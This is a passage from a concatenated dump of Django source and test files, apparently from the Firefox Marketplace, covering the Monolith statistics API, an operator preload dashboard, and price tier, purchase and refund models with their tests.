'end': self.now.strftime(self.date_format)})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 2)
res = self.client.get(self.list_url, data={
'start': self.yesterday.strftime(self.date_format),
'end': self.now.strftime(self.date_format)})
data = json.loads(res.content)
eq_(len(data['objects']), 1)
def test_filter_by_key(self):
record_stat('apps_added_us_free', self.request, value=3)
record_stat('apps_added_uk_free', self.request, value=1)
# Exact match.
res = self.client.get(self.list_url,
data={'key': 'apps_added_us_free'})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 1)
@mock.patch('mkt.monolith.views._get_query_result')
def test_on_the_fly_query(self, _get_query):
key = 'apps_ratings'
_get_query.return_value = [{
'key': key,
'recorded': datetime.date.today(),
'user_hash': None,
'value': {'count': 1, 'app-id': 123}}]
res = self.client.get(self.list_url, data={'key': key})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 1)
obj = data['objects'][0]
eq_(obj['key'], key)
eq_(obj['recorded'], datetime.date.today().strftime(self.date_format))
eq_(obj['value']['count'], 1)
eq_(obj['value']['app-id'], 123)
def test_on_the_fly_missing_start(self):
key = 'apps_ratings'
res = self.client.get(self.list_url, data={'key': key})
eq_(res.status_code, 400)
data = json.loads(res.content)
eq_(data['detail'], '`start` was not provided')
@mock.patch('mkt.monolith.views._get_query_result')
def test_on_the_fly_query_pagination(self, _get_query):
key = 'apps_ratings'
_get_query.return_value = [
{'key': key, 'recorded': datetime.date.today(), 'user_hash': None,
'value': {'count': 1, 'app-id': 123}},
{'key': key, 'recorded': datetime.date.today(), 'user_hash': None,
'value': {'count': 1, 'app-id': 234}},
{'key': key, 'recorded': datetime.date.today(), 'user_hash': None,
'value': {'count': 1, 'app-id': 345}},
]
res = self.client.get(self.list_url, data={'key': key, 'limit': 2})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 2)
ok_(data['meta']['next'] is not None)
ok_(data['meta']['previous'] is None)
eq_(data['meta']['total_count'], 3)
eq_(data['meta']['offset'], 0)
eq_(data['meta']['limit'], 2)
eq_(data['objects'][0]['value']['app-id'], 123)
eq_(data['objects'][1]['value']['app-id'], 234)
res = self.client.get(self.list_url, data={'key': key, 'limit': 2,
'offset': 2})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 1)
eq_(data['objects'][0]['value']['app-id'], 345)
ok_(data['meta']['next'] is None)
ok_(data['meta']['previous'] is not None)
eq_(data['meta']['total_count'], 3)
eq_(data['meta']['offset'], 2)
eq_(data['meta']['limit'], 2)
def test_pagination(self):
record_stat('app.install', self.request, value=2)
record_stat('app.install', self.request, value=4)
record_stat('app.install', self.request, value=6)
res = self.client.get(self.list_url, data={'limit': 2})
eq_(res.status_code, 200)
data = json.loads(res.content)
eq_(len(data['objects']), 2)
ok_(data['meta']['next'] is not None)
ok_(data['meta']['previous'] is None)
eq_(data['meta']['total_count'], 3)
eq_(data['meta']['offset'], 0)
eq_(data['meta']['limit'], 2)
class TestDateRange(TestCase):
def setUp(self):
self.today = datetime.datetime.now().replace(microsecond=0)
self.week_ago = self.days_ago(7)
def test_date_range(self):
range = list(daterange(self.week_ago, self.today))
eq_(len(range), 7)
eq_(range[0], self.week_ago)
ok_(self.today not in range)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from mkt.monolith.views import MonolithView
urlpatterns = patterns('',
url(r'^monolith/data/', MonolithView.as_view(), name='monolith-list'),
)
########NEW FILE########
__FILENAME__ = views
import datetime
import logging
from django.db.models import Avg, Count
from rest_framework import status
from rest_framework.exceptions import ParseError
from rest_framework.generics import ListAPIView
from rest_framework.response import Response
import amo
from abuse.models import AbuseReport
from reviews.models import Review
from mkt.api.authentication import RestOAuthAuthentication
from mkt.api.authorization import GroupPermission
from mkt.api.base import CORSMixin, MarketplaceView
from .forms import MonolithForm
from .models import MonolithRecord
from .serializers import MonolithSerializer
log = logging.getLogger('z.monolith')
# TODO: Move the stats that can be calculated on the fly from
# apps/stats/tasks.py here.
STATS = {
'apps_ratings': {
'qs': Review.objects
.filter(editorreview=0, addon__type=amo.ADDON_WEBAPP)
.values('addon')
.annotate(count=Count('addon')),
'type': 'slice',
'field_map': {
'count': 'count',
'app-id': 'addon'},
},
'apps_average_rating': {
'qs': Review.objects
.filter(editorreview=0, addon__type=amo.ADDON_WEBAPP)
.values('addon')
.annotate(avg=Avg('rating')),
'type': 'total',
'field_map': {
'count': 'avg',
'app-id': 'addon'},
},
'apps_abuse_reports': {
'qs': AbuseReport.objects
.filter(addon__type=amo.ADDON_WEBAPP)
.values('addon')
.annotate(count=Count('addon')),
'type': 'slice',
'field_map': {
'count': 'count',
'app-id': 'addon'},
}
}
def daterange(start, end):
for n in range((end - start).days):
yield start + datetime.timedelta(n)
def _get_query_result(key, start, end):
# To do on-the-fly queries we have to produce results as if they
# were calculated daily, which means we need to iterate over each
# day in the range and perform an aggregation on this date.
data = []
today = datetime.date.today()
stat = STATS[key]
# Choose start and end dates that make sense if none provided.
if not start:
raise ParseError('`start` was not provided')
if not end:
end = today
for day in daterange(start, end):
if stat['type'] == 'total':
# If it's a totalling queryset, we want to filter by the
# end date until the beginning of time to get the total
# objects up until this point in time.
date_filtered = stat['qs'].filter(
created__lt=(day + datetime.timedelta(days=1)))
else:
# Otherwise, we want to filter by both start/end to get
# counts on a specific day.
date_filtered = stat['qs'].filter(
created__gte=day,
created__lt=(day + datetime.timedelta(days=1)))
data.extend([{
'key': key,
'recorded': day,
'user_hash': None,
'value': {'count': d.get(stat['field_map']['count']),
'app-id': d.get(stat['field_map']['app-id'])}}
for d in date_filtered])
return data
class MonolithView(CORSMixin, MarketplaceView, ListAPIView):
cors_allowed_methods = ['get']
permission_classes = [GroupPermission('Monolith', 'API')]
authentication_classes = [RestOAuthAuthentication]
serializer_class = MonolithSerializer
def get_queryset(self):
form = MonolithForm(self.request.QUERY_PARAMS)
if not form.is_valid():
return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)
key = form.cleaned_data['key']
start = form.cleaned_data['start']
end = form.cleaned_data['end']
log.info('[Monolith] Querying key:%s [%s:%s]' % (key, start, end))
if key in STATS:
return _get_query_result(key, start, end)
else:
qs = MonolithRecord.objects.all()
if key:
qs = qs.filter(key=key)
if start is not None:
qs = qs.filter(recorded__gte=start)
if end is not None:
qs = qs.filter(recorded__lt=end)
return qs
########NEW FILE########
__FILENAME__ = helpers
import jinja2
from jingo import register
from tower import ugettext as _, ugettext_lazy as _lazy
from mkt.developers.helpers import mkt_page_title
@register.function
@jinja2.contextfunction
def operators_page_title(context, title=None):
section = _lazy('Operator Dashboard')
title = u'%s | %s' % (title, section) if title else section
return mkt_page_title(context, title)
########NEW FILE########
__FILENAME__ = test_views
from django.core.urlresolvers import reverse
from nose.tools import eq_
from pyquery import PyQuery as pq
import amo
import amo.tests
from amo.tests import app_factory
from mkt.developers.models import PreloadTestPlan
from mkt.operators.views import preloads
from mkt.site.fixtures import fixture
from users.models import UserProfile
class TestPreloadCandidates(amo.tests.TestCase):
fixtures = fixture('user_operator')
def setUp(self):
self.create_switch('preload-apps')
self.url = reverse('operators.preloads')
self.user = UserProfile.objects.get()
self.app = app_factory()
def test_preloads(self):
plan = PreloadTestPlan.objects.create(addon=self.app, filename='tstpn')
req = amo.tests.req_factory_factory(self.url, user=self.user)
res = preloads(req)
eq_(res.status_code, 200)
doc = pq(res.content)
eq_(doc('tbody tr').length, 1)
eq_(doc('td:last-child a').attr('href'),
plan.preload_test_plan_url)
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from . import views
url_patterns = patterns('',
url(r'^preloads/$', views.preloads, name='operators.preloads'),
)
########NEW FILE########
__FILENAME__ = views
from django.shortcuts import render
from waffle.decorators import waffle_switch
import amo
from amo.decorators import permission_required
from amo.utils import paginate
from mkt.developers.models import PreloadTestPlan
@permission_required('Operators', '*')
@waffle_switch('preload-apps')
def preloads(request):
preloads = (PreloadTestPlan.objects.filter(status=amo.STATUS_PUBLIC)
.order_by('addon__name'))
preloads = paginate(request, preloads, per_page=20)
return render(request, 'operators/preloads.html', {'preloads': preloads})
########NEW FILE########
__FILENAME__ = admin
from django.contrib import admin
from mkt.prices.models import Price, PriceCurrency
admin.site.register(Price)
admin.site.register(PriceCurrency)
########NEW FILE########
__FILENAME__ = load_prices
from optparse import make_option
import pprint
import requests
from django.core.management.base import BaseCommand
from mkt.prices.models import Price, PriceCurrency
domains = {
'prod': 'https://marketplace.firefox.com',
'stage': 'https://marketplace.allizom.org',
'dev': 'https://marketplace-dev.allizom.org',
'altpay': 'https://payments-alt.allizom.org'
}
endpoint = '/api/v1/webpay/prices/'
class Command(BaseCommand):
help = """
Load prices and pricecurrencies from the specified marketplace.
Defaults to prod.
"""
option_list = BaseCommand.option_list + (
make_option('--prod',
action='store_const',
const=domains['prod'],
dest='domain',
default=domains['prod'],
help='Use prod as source of data.'),
make_option('--stage',
action='store_const',
const=domains['stage'],
dest='domain',
help='Use stage as source of data.'),
make_option('--dev',
action='store_const',
const=domains['dev'],
dest='domain',
help='Use use dev as source of data.'),
make_option('--altpay',
action='store_const',
const=domains['altpay'],
dest='domain',
help='Use use payments-alt as source of data.'),
make_option('--delete',
action='store_true',
dest='delete',
default=False,
help='Start by deleting all prices.'),
make_option('--noop',
action='store_true',
dest='noop',
default=False,
help=('Show data that would be added, '
'but do not create objects.')),
)
def handle(self, *args, **kw):
data = requests.get(kw['domain'] + endpoint).json()
if kw['delete']:
Price.objects.all().delete()
PriceCurrency.objects.all().delete()
if kw['noop']:
pprint.pprint(data['objects'], indent=2)
else:
for p in data['objects']:
pr = Price.objects.create(name=p['name'].split(' ')[-1],
active=p['active'],
method=p['method'],
price=p['price'])
for pc in p['prices']:
pr.pricecurrency_set.create(currency=pc['currency'],
carrier=pc['carrier'],
price=pc['price'],
paid=pc['paid'],
tier=pc['tier'],
dev=pc['dev'],
provider=pc['provider'],
method=pc['method'],
region=pc['region'])
########NEW FILE########
__FILENAME__ = models
import uuid
from django.conf import settings
from django.core.cache import cache
from django.db import connection, models
from django.dispatch import receiver
from django.forms.models import model_to_dict
from django.utils import translation
import commonware.log
from babel import numbers
from cache_nuggets.lib import memoize_key
from jinja2.filters import do_dictsort
from tower import ugettext_lazy as _
import amo
from amo.models import ManagerBase, ModelBase
from amo.decorators import write
from amo.utils import get_locale_from_lang
from constants.payments import (CARRIER_CHOICES, PAYMENT_METHOD_ALL,
PAYMENT_METHOD_CHOICES, PROVIDER_BANGO,
PROVIDER_CHOICES, PROVIDER_LOOKUP)
from lib.constants import ALL_CURRENCIES
from mkt.constants import apps
from mkt.constants.regions import RESTOFWORLD, REGIONS_CHOICES_ID_DICT as RID
from mkt.regions.utils import remove_accents
from stats.models import Contribution
from users.models import UserProfile
log = commonware.log.getLogger('z.market')
def default_providers():
"""
Returns a list of the default providers from the settings as the
appropriate constants.
"""
return [PROVIDER_LOOKUP[p] for p in settings.PAYMENT_PROVIDERS]
def price_locale(price, currency):
lang = translation.get_language()
locale = get_locale_from_lang(lang)
pricestr = numbers.format_currency(price, currency, locale=locale)
if currency == 'EUR':
# See bug 865358. EU style guide
# (http://publications.europa.eu/code/en/en-370303.htm#position)
# disagrees with Unicode CLDR on placement of Euro symbol.
bare = pricestr.strip(u'\xa0\u20ac')
if lang.startswith(('en', 'ga', 'lv', 'mt')):
return u'\u20ac' + bare
else:
return bare + u'\xa0\u20ac'
return pricestr
def price_key(data):
return ('carrier={carrier}|tier={tier}|region={region}|provider={provider}'
.format(**data))
class PriceManager(ManagerBase):
def get_query_set(self):
qs = super(PriceManager, self).get_query_set()
return qs.transform(Price.transformer)
def active(self):
return self.filter(active=True).order_by('price')
class Price(amo.models.ModelBase):
active = models.BooleanField(default=True)
name = models.CharField(max_length=4)
price = models.DecimalField(max_digits=10, decimal_places=2)
# The payment methods availble for this tier.
method = models.IntegerField(choices=PAYMENT_METHOD_CHOICES,
default=PAYMENT_METHOD_ALL)
objects = PriceManager()
class Meta:
db_table = 'prices'
def tier_name(self):
# L10n: %s is the name of the price tier, eg: 10.
return _('Tier %s' % self.name)
def tier_locale(self, currency='USD'):
# A way to display the price of the tier.
return price_locale(self.price, currency)
def __unicode__(self):
return u'$%s' % self.price
@staticmethod
def transformer(prices):
# There are a constrained number of price currencies, let's just
# get them all.
Price._currencies = dict((price_key(model_to_dict(p)), p)
for p in PriceCurrency.objects.all())
def get_price_currency(self, carrier=None, region=None, provider=None):
"""
Returns the PriceCurrency object or none.
:param optional carrier: an int for the carrier.
:param optional region: an int for the region. Defaults to restofworld.
:param optional provider: an int for the provider. Defaults to bango.
"""
region = region or RESTOFWORLD.id
# Unless you specify a provider, we will give you the Bango tier.
# This is probably ok for now, because Bango is the default fall back
# however we might need to think about this for the long term.
provider = provider or PROVIDER_BANGO
if not hasattr(self, '_currencies'):
Price.transformer([])
lookup = price_key({
'tier': self.id, 'carrier': carrier,
'provider': provider, 'region': region
})
try:
price_currency = Price._currencies[lookup]
except KeyError:
return None
return price_currency
def get_price_data(self, carrier=None, region=None, provider=None):
"""
Returns a tuple of Decimal(price), currency, locale.
:param optional carrier: an int for the carrier.
:param optional region: an int for the region. Defaults to restofworld.
:param optional provider: an int for the provider. Defaults to bango.
"""
price_currency = self.get_price_currency(carrier=carrier,
region=region,
provider=provider)
if price_currency:
return price_currency.price, price_currency.currency
return None, None
def get_price(self, carrier=None, region=None, provider=None):
"""Return the price as a decimal for the current locale."""
return self.get_price_data(carrier=carrier, region=region,
provider=provider)[0]
def get_price_locale(self, carrier=None, region=None, provider=None):
"""Return the price as a nicely localised string for the locale."""
price, currency = self.get_price_data(carrier=carrier, region=region,
provider=provider)
if price is not None and currency is not None:
return price_locale(price, currency)
def prices(self, provider=None):
"""
A list of dicts of all the currencies and prices for this tier.
:param int provider: A provider, using the PAYMENT_* constant.
If not provided it will use settings.PAYMENT_PROVIDERS,
"""
providers = [provider] if provider else default_providers()
return [model_to_dict(o) for o in
self.pricecurrency_set.filter(provider__in=providers)]
def regions_by_name(self, provider=None):
"""A list of price regions sorted by name.
:param int provider: A provider, using the PAYMENT_* constant.
If not provided it will use settings.PAYMENT_PROVIDERS,
"""
prices = self.prices(provider=provider)
regions = set()
append_rest_of_world = False
for price in prices:
region = RID[price['region']]
if price['paid'] is True and region != RESTOFWORLD:
regions.add(region)
if price['paid'] is True and region == RESTOFWORLD:
append_rest_of_world = True
if regions:
# Sort by name based on normalized unicode name.
regions = sorted(regions,
key=lambda r: remove_accents(unicode(r.name)))
if append_rest_of_world:
regions.append(RESTOFWORLD)
return regions if regions else []
def region_ids_by_name(self, provider=None):
"""A list of price region ids sorted by name.
:param int provider: A provider, using the PAYMENT_* constant.
If not provided it will use settings.PAYMENT_PROVIDERS,
"""
return [region.id for region in
self.regions_by_name(provider=provider)]
def provider_regions(self):
"""A dict of provider regions keyed by provider id.
Sorted by name (except for rest of world which is
always last).
"""
# Avoid circular import.
from mkt.developers.providers import get_providers
provider_regions = {}
providers = get_providers()
for prv in providers:
provider_regions[prv.provider] = self.regions_by_name(
provider=prv.provider)
return provider_regions
class PriceCurrency(amo.models.ModelBase):
# The carrier for this currency.
carrier = models.IntegerField(choices=CARRIER_CHOICES, blank=True,
null=True)
currency = models.CharField(max_length=10,
choices=do_dictsort(ALL_CURRENCIES))
price = models.DecimalField(max_digits=10, decimal_places=2)
# The payments provider for this tier.
provider = models.IntegerField(choices=PROVIDER_CHOICES, blank=True,
null=True)
# The payment methods allowed for this tier.
method = models.IntegerField(choices=PAYMENT_METHOD_CHOICES,
default=PAYMENT_METHOD_ALL)
# These are the regions as defined in mkt/constants/regions.
region = models.IntegerField(default=1) # Default to restofworld.
tier = models.ForeignKey(Price)
# If this should show up in the developer hub.
dev = models.BooleanField(default=True)
# If this can currently accept payments from users.
paid = models.BooleanField(default=True)
class Meta:
db_table = 'price_currency'
verbose_name = 'Price currencies'
unique_together = ('tier', 'currency', 'carrier', 'region',
'provider')
def __unicode__(self):
return u'%s, %s: %s' % (self.tier, self.currency, self.price)
@receiver(models.signals.post_save, sender=PriceCurrency,
dispatch_uid='save_price_currency')
@receiver(models.signals.post_delete, sender=PriceCurrency,
dispatch_uid='delete_price_currency')
def update_price_currency(sender, instance, **kw):
"""
Ensure that when PriceCurrencies are updated, all the apps that use them
are re-indexed into ES so that the region information will be correct.
"""
if kw.get('raw'):
return
try:
ids = list(instance.tier.addonpremium_set
.values_list('addon_id', flat=True))
except Price.DoesNotExist:
return
if ids:
log.info('Indexing {0} add-ons due to PriceCurrency changes'
.format(len(ids)))
# Circular import sad face.
from mkt.webapps.tasks import index_webapps
index_webapps.delay(ids)
class AddonPurchase(amo.models.ModelBase):
addon = models.ForeignKey('addons.Addon')
type = models.PositiveIntegerField(default=amo.CONTRIB_PURCHASE,
choices=do_dictsort(amo.CONTRIB_TYPES),
db_index=True)
user = models.ForeignKey(UserProfile)
uuid = models.CharField(max_length=255, db_index=True, unique=True)
class Meta:
db_table = 'addon_purchase'
unique_together = ('addon', 'user')
def __unicode__(self):
return u'%s: %s' % (self.addon, self.user)
@receiver(models.signals.post_save, sender=AddonPurchase)
def add_uuid(sender, **kw):
if not kw.get('raw'):
record = kw['instance']
if not record.uuid:
record.uuid = '{pk}-{u}'.format(pk=record.pk, u=str(uuid.uuid4()))
record.save()
@write
@receiver(models.signals.post_save, sender=Contribution,
dispatch_uid='create_addon_purchase')
def create_addon_purchase(sender, instance, **kw):
"""
When the contribution table is updated with the data from PayPal,
update the addon purchase table. Will figure out if we need to add to or
delete from the AddonPurchase table.
"""
if (kw.get('raw') or
instance.type not in [amo.CONTRIB_PURCHASE, amo.CONTRIB_REFUND,
amo.CONTRIB_CHARGEBACK]):
# Whitelist the types we care about. Forget about the rest.
return
log.debug('Processing addon purchase type: %s, addon %s, user %s'
% (unicode(amo.CONTRIB_TYPES[instance.type]),
instance.addon.pk, instance.user.pk))
if instance.type == amo.CONTRIB_PURCHASE:
log.debug('Creating addon purchase: addon %s, user %s'
% (instance.addon.pk, instance.user.pk))
data = {'addon': instance.addon, 'user': instance.user}
purchase, created = AddonPurchase.objects.safer_get_or_create(**data)
purchase.update(type=amo.CONTRIB_PURCHASE)
from mkt.webapps.models import Installed # Circular import
# Ensure that devs have the correct installed object found
# or created.
#
is_dev = instance.addon.has_author(instance.user,
(amo.AUTHOR_ROLE_OWNER, amo.AUTHOR_ROLE_DEV))
install_type = (apps.INSTALL_TYPE_DEVELOPER if is_dev
else apps.INSTALL_TYPE_USER)
Installed.objects.safer_get_or_create(user=instance.user,
addon=instance.addon, install_type=install_type)
elif instance.type in [amo.CONTRIB_REFUND, amo.CONTRIB_CHARGEBACK]:
purchases = AddonPurchase.objects.filter(addon=instance.addon,
user=instance.user)
for p in purchases:
log.debug('Changing addon purchase: %s, addon %s, user %s'
% (p.pk, instance.addon.pk, instance.user.pk))
p.update(type=instance.type)
cache.delete(memoize_key('users:purchase-ids', instance.user.pk))
class AddonPremium(amo.models.ModelBase):
"""Additions to the Addon model that only apply to Premium add-ons."""
addon = models.OneToOneField('addons.Addon')
price = models.ForeignKey(Price, blank=True, null=True)
class Meta:
db_table = 'addons_premium'
def __unicode__(self):
return u'Premium %s: %s' % (self.addon, self.price)
def is_complete(self):
return bool(self.addon and self.price and
self.addon.paypal_id and self.addon.support_email)
class RefundManager(ManagerBase):
def by_addon(self, addon):
return self.filter(contribution__addon=addon)
def pending(self, addon=None):
return self.by_addon(addon).filter(status=amo.REFUND_PENDING)
def approved(self, addon):
return self.by_addon(addon).filter(status=amo.REFUND_APPROVED)
def instant(self, addon):
return self.by_addon(addon).filter(status=amo.REFUND_APPROVED_INSTANT)
def declined(self, addon):
return self.by_addon(addon).filter(status=amo.REFUND_DECLINED)
def failed(self, addon):
return self.by_addon(addon).filter(status=amo.REFUND_FAILED)
class Refund(ModelBase):
# This refers to the original object with `type=amo.CONTRIB_PURCHASE`.
contribution = models.OneToOneField('stats.Contribution')
# Pending => 0
# Approved => 1
# Instantly Approved => 2
# Declined => 3
# Failed => 4
status = models.PositiveIntegerField(default=amo.REFUND_PENDING,
choices=do_dictsort(amo.REFUND_STATUSES), db_index=True)
refund_reason = models.TextField(default='', blank=True)
rejection_reason = models.TextField(default='', blank=True)
# Date `created` should always be date `requested` for pending refunds,
# but let's just stay on the safe side. We might change our minds.
requested = models.DateTimeField(null=True, db_index=True)
approved = models.DateTimeField(null=True, db_index=True)
declined = models.DateTimeField(null=True, db_index=True)
user = models.ForeignKey('users.UserProfile')
objects = RefundManager()
class Meta:
db_table = 'refunds'
def __unicode__(self):
return u'%s (%s)' % (self.contribution, self.get_status_display())
@staticmethod
def post_save(sender, instance, **kwargs):
from amo.tasks import find_refund_escalations
find_refund_escalations(instance.contribution.addon_id)
@classmethod
def recent_refund_ratio(cls, addon_id, since):
"""
Returns the ratio of purchases to refunds since the given datetime.
"""
cursor = connection.cursor()
purchases = AddonPurchase.objects.filter(
addon=addon_id, type=amo.CONTRIB_PURCHASE).count()
if purchases == 0:
return 0.0
params = [addon_id, since]
# Hardcoded statuses for simplicity, but they are:
# amo.REFUND_PENDING, amo.REFUND_APPROVED, amo.REFUND_APPROVED_INSTANT
sql = '''
SELECT COUNT(DISTINCT sc.user_id) AS num
FROM refunds
LEFT JOIN stats_contributions AS sc
ON refunds.contribution_id = sc.id
WHERE sc.addon_id = %s
AND refunds.status IN (0,1,2)
AND refunds.created > %s
'''
cursor.execute(sql, params)
row = cursor.fetchone()
if row:
return row[0] / float(purchases)
return 0.0
models.signals.post_save.connect(Refund.post_save, sender=Refund)
class AddonPaymentData(ModelBase):
# Store information about the app. This can be entered manually
# or got from PayPal. At the moment, I'm just capturing absolutely
# everything from PayPal and that's what these fields are.
# Easier to do this and clean out later.
# See: http://bit.ly/xy5BTs and http://bit.ly/yRYbRx
#
# I've no idea what the biggest lengths of these are, so making
# up some aribtrary lengths.
addon = models.OneToOneField('addons.Addon', related_name='payment_data')
# Basic.
first_name = models.CharField(max_length=255, blank=True)
last_name = models.CharField(max_length=255, blank=True)
email = models.EmailField(blank=True)
full_name = models.CharField(max_length=255, blank=True)
business_name = models.CharField(max_length=255, blank=True)
country = models.CharField(max_length=64)
payerID = models.CharField(max_length=255, blank=True)
# Advanced.
address_one = models.CharField(max_length=255)
address_two = models.CharField(max_length=255, blank=True)
post_code = models.CharField(max_length=128, blank=True)
city = models.CharField(max_length=128, blank=True)
state = models.CharField(max_length=64, blank=True)
phone = models.CharField(max_length=32, blank=True)
class Meta:
db_table = 'addon_payment_data'
@classmethod
def address_fields(cls):
return [field.name for field in cls._meta.fields
if isinstance(field, (models.CharField, models.EmailField))]
def __unicode__(self):
return u'%s: %s' % (self.pk, self.addon)
########NEW FILE########
__FILENAME__ = serializers
from rest_framework import serializers
from constants.payments import PROVIDER_LOOKUP
from mkt.prices.models import Price, price_locale
class PriceSerializer(serializers.ModelSerializer):
prices = serializers.SerializerMethodField('get_prices')
localized = serializers.SerializerMethodField('get_localized_prices')
pricePoint = serializers.CharField(source='name')
name = serializers.CharField(source='tier_name')
class Meta:
model = Price
def get_prices(self, obj):
provider = self.context['request'].GET.get('provider', None)
if provider:
provider = PROVIDER_LOOKUP[provider]
return obj.prices(provider=provider)
def get_localized_prices(self, obj):
region = self.context['request'].REGION
for price in self.get_prices(obj):
if price['region'] == region.id:
result = price.copy()
result.update({
'locale': price_locale(price['price'], price['currency']),
'region': region.name,
})
return result
return {}
########NEW FILE########
__FILENAME__ = test_models
import datetime
from decimal import Decimal
from django.utils import translation
import mock
from nose.tools import eq_, ok_
import amo
import amo.tests
from addons.models import AddonUser
from constants.payments import PROVIDER_BANGO, PROVIDER_BOKU
from mkt.constants import apps
from mkt.constants.regions import (ALL_REGION_IDS, BR, HU,
SPAIN, UK, US, RESTOFWORLD)
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.prices.models import AddonPremium, Price, PriceCurrency, Refund
from stats.models import Contribution
from users.models import UserProfile
class TestPremium(amo.tests.TestCase):
fixtures = fixture('prices2', 'webapp_337141')
def setUp(self):
self.tier_one = Price.objects.get(pk=1)
self.addon = Webapp.objects.get(pk=337141)
def test_is_complete(self):
self.addon.support_email = '[email protected]'
ap = AddonPremium(addon=self.addon)
assert not ap.is_complete()
ap.price = self.tier_one
assert not ap.is_complete()
ap.addon.paypal_id = 'asd'
assert ap.is_complete()
class TestPrice(amo.tests.TestCase):
fixtures = fixture('prices2')
def setUp(self):
self.tier_one = Price.objects.get(pk=1)
if hasattr(Price, '_currencies'):
del Price._currencies # needed to pick up fixtures.
def test_active(self):
eq_(Price.objects.count(), 2)
eq_(Price.objects.active().count(), 1)
def test_active_order(self):
Price.objects.create(name='USD', price='0.00')
Price.objects.create(name='USD', price='1.99')
eq_(list(Price.objects.active().values_list('price', flat=True)),
[Decimal('0.00'), Decimal('0.99'), Decimal('1.99')])
def test_method_default_all(self):
price = Price.objects.create(name='USD', price='0.00')
eq_(price.method, 2)
def test_method_specified(self):
price = Price.objects.create(name='USD', price='0.99', method=0)
eq_(price.method, 0)
def test_currency(self):
eq_(self.tier_one.pricecurrency_set.count(), 3)
def test_get(self):
eq_(Price.objects.get(pk=1).get_price(), Decimal('0.99'))
def test_get_tier(self):
translation.activate('en_CA')
eq_(Price.objects.get(pk=1).get_price(), Decimal('0.99'))
eq_(Price.objects.get(pk=1).get_price_locale(), u'US$0.99')
def test_get_tier_and_locale(self):
translation.activate('pt_BR')
eq_(Price.objects.get(pk=2).get_price(), Decimal('1.99'))
eq_(Price.objects.get(pk=2).get_price_locale(), u'US$1,99')
def test_no_region(self):
eq_(Price.objects.get(pk=2).get_price_locale(region=HU.id), None)
def test_fallback(self):
translation.activate('foo')
eq_(Price.objects.get(pk=1).get_price(), Decimal('0.99'))
eq_(Price.objects.get(pk=1).get_price_locale(), u'$0.99')
def test_transformer(self):
price = Price.objects.get(pk=1)
price.get_price_locale()
# Warm up Price._currencies.
with self.assertNumQueries(0):
eq_(price.get_price_locale(), u'$0.99')
def test_get_tier_price(self):
eq_(Price.objects.get(pk=2).get_price_locale(region=BR.id), 'R$1.01')
def test_get_tier_price_provider(self):
# Because we specify Boku, there is no tier to be found.
eq_(Price.objects.get(pk=2)
.get_price_locale(region=BR.id, provider=PROVIDER_BOKU), None)
# Turning on Boku will give us the tier.
PriceCurrency.objects.get(pk=3).update(provider=PROVIDER_BOKU)
eq_(Price.objects.get(pk=2)
.get_price_locale(region=BR.id, provider=PROVIDER_BOKU), 'R$1.01')
def test_get_free_tier_price(self):
price = self.make_price('0.00')
eq_(price.get_price_locale(region=US.id), '$0.00')
def test_euro_placement(self):
with self.activate('en-us'):
eq_(Price.objects.get(pk=2).get_price_locale(region=SPAIN.id),
u'\u20ac0.50')
with self.activate('es'):
eq_(Price.objects.get(pk=2).get_price_locale(region=SPAIN.id),
u'0,50\xa0\u20ac')
def test_prices(self):
currencies = Price.objects.get(pk=1).prices()
eq_(len(currencies), 2)
eq_(currencies[0]['currency'], 'PLN')
def test_wrong_currency(self):
bad = 4999
ok_(bad not in ALL_REGION_IDS)
ok_(not Price.objects.get(pk=1).get_price('foo', region=bad))
def test_prices_provider(self):
currencies = Price.objects.get(pk=1).prices(provider=PROVIDER_BANGO)
eq_(len(currencies), 2)
def test_multiple_providers(self):
PriceCurrency.objects.get(pk=2).update(provider=PROVIDER_BOKU)
# This used to be 0, so changing it to 3 puts in scope of the filter.
with self.settings(PAYMENT_PROVIDERS=['bango', 'boku']):
currencies = Price.objects.get(pk=1).prices()
eq_(len(currencies), 3)
def test_region_ids_by_name_multi_provider(self):
with self.settings(PAYMENT_PROVIDERS=['bango', 'boku']):
eq_(Price.objects.get(pk=2).region_ids_by_name(),
[BR.id, SPAIN.id, UK.id, RESTOFWORLD.id])
def test_region_ids_by_name(self):
eq_(Price.objects.get(pk=2).region_ids_by_name(),
[BR.id, SPAIN.id, RESTOFWORLD.id])
def test_region_ids_by_name_w_provider_boku(self):
eq_(Price.objects.get(pk=2).region_ids_by_name(
provider=PROVIDER_BOKU), [UK.id])
def test_region_ids_by_name_w_provider_bango(self):
eq_(Price.objects.get(pk=2).region_ids_by_name(
provider=PROVIDER_BANGO), [BR.id, SPAIN.id, RESTOFWORLD.id])
def test_provider_regions(self):
with self.settings(PAYMENT_PROVIDERS=['bango', 'boku']):
eq_(Price.objects.get(pk=2).provider_regions(), {
PROVIDER_BANGO: [BR, SPAIN, RESTOFWORLD],
PROVIDER_BOKU: [UK]})
def test_provider_regions_boku(self):
with self.settings(PAYMENT_PROVIDERS=['boku']):
eq_(Price.objects.get(pk=2).provider_regions(), {
PROVIDER_BOKU: [UK]})
def test_provider_regions_bango(self):
with self.settings(PAYMENT_PROVIDERS=['bango']):
eq_(Price.objects.get(pk=2).provider_regions(), {
PROVIDER_BANGO: [BR, SPAIN, RESTOFWORLD]})
class TestPriceCurrencyChanges(amo.tests.TestCase):
def setUp(self):
self.addon = amo.tests.addon_factory()
self.make_premium(self.addon)
self.currency = self.addon.premium.price.pricecurrency_set.all()[0]
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_save(self, index_webapps):
self.currency.save()
eq_(index_webapps.delay.call_args[0][0], [self.addon.pk])
@mock.patch('mkt.webapps.tasks.index_webapps')
def test_delete(self, index_webapps):
self.currency.delete()
eq_(index_webapps.delay.call_args[0][0], [self.addon.pk])
class ContributionMixin(object):
def setUp(self):
self.addon = Webapp.objects.get(pk=337141)
self.user = UserProfile.objects.get(pk=999)
def create(self, type):
return Contribution.objects.create(type=type, addon=self.addon,
user=self.user)
def purchased(self):
return (self.addon.addonpurchase_set
.filter(user=self.user, type=amo.CONTRIB_PURCHASE)
